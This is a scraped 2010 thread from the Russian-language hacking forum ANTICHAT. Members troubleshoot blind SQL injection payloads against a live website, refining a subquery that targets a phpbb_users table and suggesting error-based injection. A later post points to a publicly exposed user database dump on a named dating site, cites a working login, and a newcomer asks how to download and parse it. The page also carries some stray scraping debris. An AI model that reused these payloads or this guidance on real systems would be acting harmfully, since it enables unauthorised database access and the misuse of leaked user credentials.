ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.12.2010, 21:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от cipa21
cipa21 said:
Немножко не по теме, извините!
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
|
|
|

26.12.2010, 21:48
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме: 71852
Репутация:
0
|
|
Сообщение от попугай
попугай said:
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Подозрительно все это, такой ресурс хороший...Ну все равно спасибо за ответ!
|
|
|

26.12.2010, 21:52
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме: 6860213
Репутация:
378
|
|
делаю запрос (id*IF(ASCII(SUBSTRING(version(),1,1))=53,1,-1)) все ок, ясно что версия 5
но когда пытаюсь выбрать из базы:
(id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))
вылазит ошибка
Invalid SQL: SELECT * FROM `arts` WHERE id = (id*IF(ASCII(SUBSTRING(select+1+from+phpbb_users,1 ,1))=53,1,-1))
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'select+1+from+phpbb_users,1,1))=53,1,-1))' at line 1
в чем проблема?
|
|
|

26.12.2010, 21:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
InferNo23
подзапрос select надо взять в скобки
SUBSTRING((select+1+from+phpbb_users+limit+0,1),1 ,1))=53,1,-1))
|
|
|

26.12.2010, 22:14
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме: 6860213
Репутация:
378
|
|
Сообщение от Konqi
Konqi said:
InferNo23
подзапрос select надо взять в скобки
SUBSTRING(
(
select+1+from+phpbb_users+limit+0,1
)
,1 ,1))=53,1,-1))
(id*IF(ASCII(SUBSTRING((select+1+from+phpbb_users+ limit+0,1),1,1))=53,1,-1))
теперь
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+phpbb_users+limit+0,1),1,1))=53,1,-1))' at line 1
|
|
|

26.12.2010, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 73674
Репутация:
16
|
|
Сообщение от None
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Сообщение от None
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
" if author else f"
Кто знает по каким причинам не работает inj3kt0r.com ? Последний раз я заходил туда месяца 3-4 назад...
Сообщение от None
http://whois.domaintools.com/inj3ct0r.com
Note: This Domain Name is Suspended.
In this status the domain name is InActive and will not function.
Вродь дернули на 1337db.com, но сайт тоже не отвечает.
Следите за ихним твиттером, возможно, объявятся еще.
|
|
|
|

26.12.2010, 22:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
InferNo23
так закрытыми глазами ниче сказать не могу, если не жалко скинь сайт, посмотрим.
ах да забыл сказать, если там видна ошибка мускула, ты не пробовал проводить error based иньекцию?
зачем посимвольно..
|
|
|

27.12.2010, 15:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
|
|
|
|

27.12.2010, 15:35
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме: 7518056
Репутация:
1089
|
|
Сообщение от Dagger
Dagger said:
http://www.tringuladating.com//db/
Что это, и с чем его едят-))) Просьба не смеяться- я учусь только.
странно- там дамп БД юзерей в плейнтексте trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone ,у большинства пароль просто password из чего делаем вывод что наполнял его сам админ и больше полофины юзерей- фейки
|
|
|

27.12.2010, 15:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от Kusto
Kusto said:
странно- там дамп БД юзерей в плейнтексте
trindating_user.sql.gz скачивай и заходи под любым ну как пример meetmeone:meetmeone
А чем и как правильно скачать? Он то и блокнотом открывается, но как то в перемешку, как его обработать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|